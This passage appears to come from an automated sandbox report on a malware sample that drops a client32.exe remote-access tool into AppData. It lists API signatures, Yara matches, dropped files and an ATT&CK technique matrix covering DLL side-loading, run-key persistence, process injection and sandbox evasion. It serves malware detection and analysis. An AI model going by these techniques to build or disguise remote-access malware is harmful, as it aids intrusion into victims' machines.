Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	6_2_68C921DC
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: EnumSystemLocalesA,	6_2_68C92151
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	6_2_68C92175
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	8_2_1117053C
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: GetLocaleInfoA,	8_2_11167B5E
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	8_2_11170011
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	8_2_11170500
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	8_2_11170499

Source: C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

Code function: 6_2_1101D180 __time64,SetRect,GetLocalTime,

6_2_1101D180

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

Code function: 6_2_1103B220 _calloc,GetUserNameA,_free,_calloc,_free,

6_2_1103B220

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

6_2_1109D4A0

Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_1106F210 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,		6_2_1106F210
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 6_2_68C6A980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,		6_2_68C6A980

Source: Yara match	File source: 6.2.client32.exe.70060000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.client32.exe.70060000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.client32.exe.6fff0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.client32.exe.6fff0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.client32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.client32.exe.6fff0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.client32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.client32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.client32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.client32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.56196e0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.client32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.client32.exe.70060000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.55e0b9c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.560f508.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.client32.exe.68c60000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.1758048452.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1657069390.0000000005617000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1674375162.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.1666448748.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3146712251.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3138687651.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.1572772209.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3141893648.00000000025D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1674299523.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1657069390.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1673364072.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.1755559896.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1757246329.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1657069390.00000000055F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1758015972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1657069390.000000000581E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7320, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 6588, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 564, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: client32.exe PID: 2636, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SystemUtil\AudioCapture.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SystemUtil\PCICHEK.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SystemUtil\pcicapi.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SystemUtil\TCCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SystemUtil\HTCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SystemUtil\PCICL32.DLL, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 Input Capture	11 System Time Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	3 Native API	2 Valid Accounts	2 Valid Accounts	3 Obfuscated Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Screen Capture	22 Encrypted Channel	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	11 Registry Run Keys / Startup Folder	21 Access Token Manipulation	11 Software Packing	Security Account Manager	1 System Service Discovery	SMB/Windows Admin Shares	1 Input Capture	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 PowerShell	Login Hook	12 Process Injection	1 DLL Side-Loading	NTDS	3 File and Directory Discovery	Distributed Component Object Model	3 Clipboard Data	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	11 Registry Run Keys / Startup Folder	2 Masquerading	LSA Secrets	33 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Valid Accounts	Cached Domain Credentials	151 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	31 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	11 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	3 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
KC0uZWwr8p.exe	16%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\Program Files (x86)\Advanced IP Scanner\Qt5Core.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\Qt5Gui.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\Qt5Network.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\Qt5PrintSupport.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\Qt5Widgets.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\Qt5WinExtras.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\Qt5Xml.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_console.exe (copy)	3%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-console-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-datetime-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-debug-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-errorhandling-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-2-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l2-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-handle-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-heap-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-interlocked-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-libraryloader-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-localization-l1-2-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-memory-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-namedpipe-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processenvironment-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-1.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-profile-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-rtlsupport-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-string-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-2-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-sysinfo-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-timezone-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-util-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-conio-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-convert-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-environment-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-filesystem-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-heap-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-locale-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-math-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-multibyte-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-private-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-process-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-runtime-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-stdio-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-string-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-time-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-utility-l1-1-0.dll (copy)	0%	ReversingLabs
